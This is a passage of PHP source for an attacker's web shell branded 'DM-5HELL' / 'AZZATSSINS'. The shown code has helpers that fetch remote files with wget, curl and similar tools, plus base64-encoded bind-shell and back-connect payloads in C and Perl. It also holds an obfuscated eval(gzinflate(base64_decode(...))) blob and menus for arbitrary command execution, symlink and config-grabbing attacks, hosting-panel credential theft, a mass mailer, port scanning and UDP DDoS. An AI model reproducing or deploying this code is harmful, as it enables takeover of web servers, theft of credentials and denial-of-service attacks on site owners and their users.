  596. if($fp = @fopen($link,"r")){
  597. while(!feof($fp)) {
  598. $cont.= @fread($fp,1024);
  599. }
  600. @fclose($fp);
  601. $fp2 = @fopen($file,"w");
  602. @fwrite($fp2,$cont);
  603. @fclose($fp2);
  604. }
  605. }
  606. function which($pr){
  607. $path = exe("which $pr");
  608. if(!empty($path)) {
  609. return trim($path);
  610. } else {
  611. return trim($pr);
  612. }
  613. }
  614. function download($cmd,$url){
  615. $namafile = basename($url);
  616. switch($cmd) {
  617. case 'wwget':
  618. exe(which('wget')." ".$url." -O ".$namafile);
  619. break;
  620. case 'wlynx':
  621. exe(which('lynx')." -source ".$url." >".$namafile);
  622. break;
  623. case 'wfread' :
  624. ambil($wurl,$namafile);
  625. break;
  626. case 'wfetch' :
  627. exe(which('fetch')." -o ".$namafile." -p ".$url);
  628. break;
  629. case 'wlinks' :
  630. exe(which('links')." -source ".$url." >".$namafile);
  631. break;
  632. case 'wget' :
  633. exe(which('GET')." ".$url." >".$namafile);
  634. break;
  635. case 'wcurl' :
  636. exe(which('curl')." ".$url." -o ".$namafile);
  637. break;
  638. default:
  639. break;
  640. }
  641. return $namafile;
  642. }
  643.  
  644. // Fungsi array utk CHMOD / permission //
  645. function get_perms($file) {
  646. if($mode=@fileperms($file)){
  647. $perms='';
  648. $perms .= ($mode & 00400) ? 'r' : '-';
  649. $perms .= ($mode & 00200) ? 'w' : '-';
  650. $perms .= ($mode & 00100) ? 'x' : '-';
  651. $perms .= ($mode & 00040) ? 'r' : '-';
  652. $perms .= ($mode & 00020) ? 'w' : '-';
  653. $perms .= ($mode & 00010) ? 'x' : '-';
  654. $perms .= ($mode & 00004) ? 'r' : '-';
  655. $perms .= ($mode & 00002) ? 'w' : '-';
  656. $perms .= ($mode & 00001) ? 'x' : '-';
  657. return $perms;
  658. }
  659. else return "?????";
  660. }
  661.  
  662. function clearspace($text){
  663. return str_replace(" ","_",$text);
  664. }
  665.  
  666. // Fungsi NetSploit //
  667. $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
  668. $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
  669. $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
  670. $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
  671. ?>
  672.  
  673. <html><head>
  674. <title>
  675. :: AZZATSSINS ::
  676. </title>
  677.  
  678. <script type="text/javascript">
  679. function tukar(lama,baru){
  680. document.getElementById(lama).style.display = 'none';
  681. document.getElementById(baru).style.display = 'block';
  682. }
  683. function blink() {
  684. var blinks = document.getElementsByTagName('kelip');
  685. for (var i = blinks.length - 1; i >= 0; i--) {
  686. var s = blinks[i];
  687. s.style.visibility = (s.style.visibility === 'visible') ? 'hidden' : 'visible';
  688. }
  689. window.setTimeout(blink, 500);
  690. }
  691. if (document.addEventListener) document.addEventListener("DOMContentLoaded", blink, false);
  692. else if (window.addEventListener) window.addEventListener("load", blink, false);
  693. else if (window.attachEvent) window.attachEvent("onload", blink);
  694. else window.onload = blink;
  695. </script>
  696.  
  697. <style type="text/css">
  698. body{
  699. background:#000000;
  700. }
  701.  
  702. a { text-decoration:none; }
  703. a:hover{ border-bottom:1px solid white; }
  704.  
  705. *{ font-size:11px;font-family:Tahoma,Verdana,Arial;color:#FFFFFF; }
  706.  
  707. #menu{ background:#111111;margin:8px 2px 4px 2px; }
  708.  
  709. #menu a{ padding:4px 18px;
  710. margin:0;
  711.  
  712. background:#222222;
  713. text-decoration:none;
  714. letter-spacing:2px;
  715. border-radius: 4px;
  716. border-bottom:2px solid #444444;
  717. border-top:2px solid #444444;
  718. border-right:2px solid red;
  719. border-left:2px solid red;
  720. }
  721.  
  722. #menu a:hover{
  723. background:#191919;
  724. border-radius: 7px;
  725. border-bottom:2px solid #white;
  726. border-top:2px solid #white;
  727. border-right:2px solid #FF0000;
  728. border-left:2px solid #FF0000;
  729. }
  730.  
  731. .tabnet{ margin:15px auto 0 auto;border: 1px solid #333333; }
  732.  
  733. .main {
  734. width:90%;
  735. margin:30px auto 10px;
  736. padding:10px 10px 5px 10px;
  737. border-radius:5px;
  738. -moz-border-radius:5px;
  739. -moz-box-shadow:0px 0px 10px #FFFFFF;
  740. }
  741.  
  742. .gaya { color: red; }
  743.  
  744. .gaya a { color: white; }
  745.  
  746. .inputz{ background:#111111;
  747. border:0;
  748. padding:2px;
  749. border-bottom:1px solid #FF0000;
  750. border-top:1px solid #FF0000; }
  751.  
  752. .inputzbut{
  753. background:#111111;
  754. color:#FF0000;
  755. margin:0 4px;
  756. border:1px solid #444444;
  757. border-bottom:1px solid #FF0000;
  758. border-top:1px solid #FF0000;
  759. border-right:1px solid #FF0000;
  760. border-left:1px solid #FF0000;
  761. }
  762.  
  763. .inputz:hover, .inputzbut:hover{
  764. border-bottom:1px solid white;
  765. border-top:1px solid white;
  766. }
  767.  
  768. .output { margin:auto;
  769. border:1px solid #FF0000;
  770. width:100%;
  771. height:400px;
  772. background:#000000;
  773. padding:0 2px; }
  774.  
  775. .cmdbox{ width:100%; }
  776.  
  777. .head_info{ padding: 0 4px; }
  778.  
  779. .dminfox {
  780. font-size:11px;
  781. font-family:Tahoma,Verdana,Arial;
  782. color:white;
  783. }
  784.  
  785. .infodmx {
  786. font-size:11px;
  787. font-family:Tahoma,Verdana,Arial;
  788. color:red;
  789. }
  790.  
  791. .b0{
  792. font-size:30px;padding:0;color:#444444;
  793. }
  794. .b1{
  795. font-size:25px;padding:0;color:red;
  796. }
  797. .b2{
  798. font-size:25px;padding:0;color:white;
  799. }
  800. .b3{
  801. font-size:10px;padding:0;color:red;
  802. }
  803. .b4{
  804. font-size:20px;padding:0;color:#FF0000;
  805. }
  806. .b5{
  807. font-size:20px;padding:0;color:#FFFFFF;
  808. }
  809. .b6{
  810. font-size:20px;padding:0;color:#00FF00;
  811. }
  812. .b7{
  813. font-size:20px;padding:0;color:red;
  814. }
  815. .b8{
  816. font-size:20px;padding:0;color:white;
  817. }
  818. .b9{
  819. font-size:20px;padding:0;color:yellow;
  820. }
  821. .b10{
  822. font-size:20px;padding:0;color:#444444;
  823. }
  824. .b11{
  825. font-size:10px;padding:0;color:yellow;
  826. }
  827. .b12{
  828. font-size:10px;padding:0;color:#444444;
  829. }
  830.  
  831. .b_tbl{ text-align:center;
  832. margin:0 1px 0 0;
  833. padding:0 1px 0 0;
  834. border-right:1px solid #333333; }
  835.  
  836. .c_tbl{ text-align:center;
  837. margin:0 4px 0 0;
  838. padding:0 4px 0 0;
  839. border-left:1px solid #333333; }
  840.  
  841. .phpinfo table{ width:100%;
  842. padding:0 0 0 0; }
  843.  
  844. .phpinfo td{ background:#191919;
  845. color:#cccccc;
  846. padding:6px 8px;; }
  847.  
  848. .phpinfo th, th{ background:#111111;
  849. border-bottom:1px solid #333333;
  850. font-weight:normal; }
  851.  
  852. .phpinfo h2, .phpinfo h2 a{ text-align:center;
  853. font-size:16px;
  854. padding:0;
  855. margin:30px 0 0 0;
  856. background:#222222;
  857. padding:4px 0; }
  858.  
  859. .explore{ width:100%; }
  860.  
  861. .explore a { text-decoration:none; }
  862. .explore td{ border-bottom:1px solid white;
  863. padding:0 8px;
  864. line-height:10px; }
  865.  
  866. .explore th{ padding:3px 8px;
  867. font-weight:normal; }
  868.  
  869. .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid white; }
  870.  
  871. .explore tr:hover{ background:#444444;
  872. cursor:pointer; }
  873.  
  874. .viewfile{ background:#EDECEB;
  875. color:#000000;
  876. margin:4px 2px;
  877. padding:8px; }
  878.  
  879. .sembunyi{ display:none;
  880. padding:0;margin:0;}
  881.  
  882. .info{ background:#111111;
  883. width:99%;
  884. padding:5px;
  885. margin:10px auto 5px;
  886. text-align:center;
  887. font-size:13px;}
  888.  
  889. .info a{ font-size:14px;}
  890. .info span{ font-size:14px;}
  891. .jaya{ margin:5px; text-align:right; }
  892. </style>
  893. </head>
  894. <body onLoad="document.getElementById('cmd').focus();">
  895. <div class="main"><div class="head_info">
  896. <table><tr><td>
  897.  
  898. <table class="b_tbl">
  899. <tr><td>
  900. <a href="?"><img src="http://azzat.wap.mu/files/1049320/az-bn-idb.png" width="140" heigth="125"></a>
  901. </td></tr>
  902. <tr><td>
  903. <nobr><b><span class="b1">DM-5</span><span class="b2">HELL</span></b></a></nobr>
  904. </td></tr>
  905. <tr><td>
  906. <nobr><b><span style=font-size:15px;padding:0;color:#444444;">Private Security Web Shell</span></b></nobr>
  907. </td></tr>
  908. <tr><td><? if(isset($auth_pass)){ echo "<form method='POST'> <input type='SUBMIT' class='inputz' name='logout' value=' [ LOG OUT ] '></form>"; } ?></td></tr>
  909. </table>
  910. </td>
  911. <td><?php echo $buff; ?></td>
  912.  
  913. </tr></table></div>
  914.  
  915.  
  916. <!-- ARE YOU READY ? :D -->
  917.  
  918. <!-- 1 -->
  919. <!-- 2 -->
  920. <!-- 3 -->
  921.  
  922. <!-- LET'S PLAY THE MUSIC :D -->
  923.  
  924. <br><br>
  925. <div id="menu" align="center">
  926. <table><tr>
  927. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>">HOME</a></b></td>
  928. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=".$pwd; ?>&amp;x=phpinfo">PHP INFO</a></b></td>
  929. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=mysql1">MYSQL I</a></b></td>
  930. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=mysql2">MYSQL II</a></b></td>
  931. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=upload">UPLOAD</a></b></td>
  932. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=mail">MAILER</a></b></td>
  933. </tr></table></div>
  934.  
  935. <!-- Let's Make A Little Command For Safety First :) -->
  936.  
  937. <div id="menu" align="center">
  938. <table><tr>
  939. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=php">EVAL</a></b></td>
  940. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=shell">SHELL</a></b></td>
  941. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=dmsec1">HTACCESS</a></b></td>
  942. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=dmsec2">PHP.INI</a></b></td>
  943. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=dmsec3">BASEDIR</a></b></td>
  944. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=dmsec4">PROCESS</a></b></td>
  945. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=netsploit">NETSPLOIT</a></b></td>
  946. </tr></table></div>
  947.  
  948. <!-- Next You Always Say This Is Config Fvcker -->
  949. <!-- Oh Yeah Honey :* Please Don't Tell Everybody If You Will Fucking Me Now :* -->
  950.  
  951. <div id="menu" align="center"><table><tr>
  952. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=jumping">JUMP</a></b></td>
  953. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=grabber">GRAB</a></b></td>
  954. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=ckperl">PERL</a></b></td>
  955. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=apache">APACHE</a></b></td>
  956. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=hostgator">HOSTGATOR</a></b></td>
  957. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=bluehost">BLUEHOST</a></b></td>
  958. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=ovh">OVH</a></b></td>
  959. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=litespeed">LITESPEED</a></b></td>
  960. </tr></table></div>
  961.  
  962. <!-- Are You Like Symlink Methode ? Haha :D Funny LoL -->
  963.  
  964. <div id="menu" align="center"><table><tr>
  965. <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=dmsym1">SYMLINK1</a></b></nobr></td>
  966. <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=dmsym2">SYMLINK2</a></b></nobr></td>
  967. <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=dmsym3">SYMLINK3</a></b></nobr></td>
  968. <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=dmsym4">SYMLINK4</a></b></nobr></td>
  969. <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=dmsym5">SYMLINK5</a></b></nobr></td>
  970. <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=dmsym6">SYMLINK6</a></b></nobr></td>
  971. </tr></table></div>
  972.  
  973. <!-- Hhmmm... Are You Like WHMCS ? -->
  974. <!-- Haha Me Too :D Think Again Dude -->
  975. <!-- If You And Me Like WHMCS, WHO WE ARE ;D Lolers? -->
  976.  
  977. <div id="menu" align="center"><table><tr>
  978. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=whmcs1">WHMCS</a></b></td>
  979. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=whmcs2">WHMCS II</a></b></td>
  980. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=plesk">PLESK</a></b></td>
  981. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=reseller">RESELLER</a></b></td>
  982. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=crypter">ENCRYPT</a></b></td>
  983. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=cgi2012">CGI2012</a></b></td>
  984. </tr></table></div>
  985.  
  986. <!-- How About This Man ? -->
  987. <!-- nanana yayaya lalala enjoy the cms ;v -->
  988.  
  989. <div id="menu" align="center"><table><tr>
  990. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=cpanel">CPANEL</a></b></td>
  991. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=iis7">IIS 7.5</a></b></td>
  992. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=dmwp">WP</a></b></td>
  993. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=dmjm">JOOMLA</a></b></td>
  994. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=dmvb">VB</a></b></td>
  995. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=skype">SKYPE</a></b></td>
  996. </tr></table></div>
  997.  
  998. <!-- Sexy Women Sexy On Your Bed :D wkwkwk -->
  999.  
  1000. <div id="menu" align="center"><table><tr>
  1001. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=unzip">UNZIP</a></b></td>
  1002. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=coding">ENCODE</a></b></td>
  1003. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=analyzer">ANALYZER</a></b></td>
  1004. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=tools">OTHER TOOLS</a></b></td>
  1005. </tr></table></div>
  1006.  
  1007. <!-- Maybe This Can Help You :) -->
  1008.  
  1009. <div id="menu" align="center"><table><tr>
  1010. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=sscan">SHELL SCAN</a></b></td>
  1011. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=pscan">PORT SCAN</a></b></td>
  1012. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=ddos">UDP DDOS</a></b></td></tr></table></div>
  1013.  
  1014. <!-- Last Songs From EviLolers -->
  1015.  
  1016. <div id="menu" align="center"><table><tr>
  1017. <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&amp;x=about">ABOUT ME</a></b></td>
  1018. <td style=\"text-align:center;\"><b><a href="?<?phwd; ?>&amp;x=kill">KILL SHELL</a></b></td>
  1019. </tr></table></div>
  1020.  
  1021. <!-- Okay... It's Time To Play.. With Us.. -->
  1022. <!-- You'll Never Know Before You Try It First -->
  1023.  
  1024. <?php
  1025. if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
  1026. <form action="?dm=<?php echo $pwd; ?>&amp;x=php" method="post">
  1027. <table class="cmdbox"><tr><td>
  1028. <textarea class="output" name="cmd" id="cmd"><? eval(gzinflate(base64_decode('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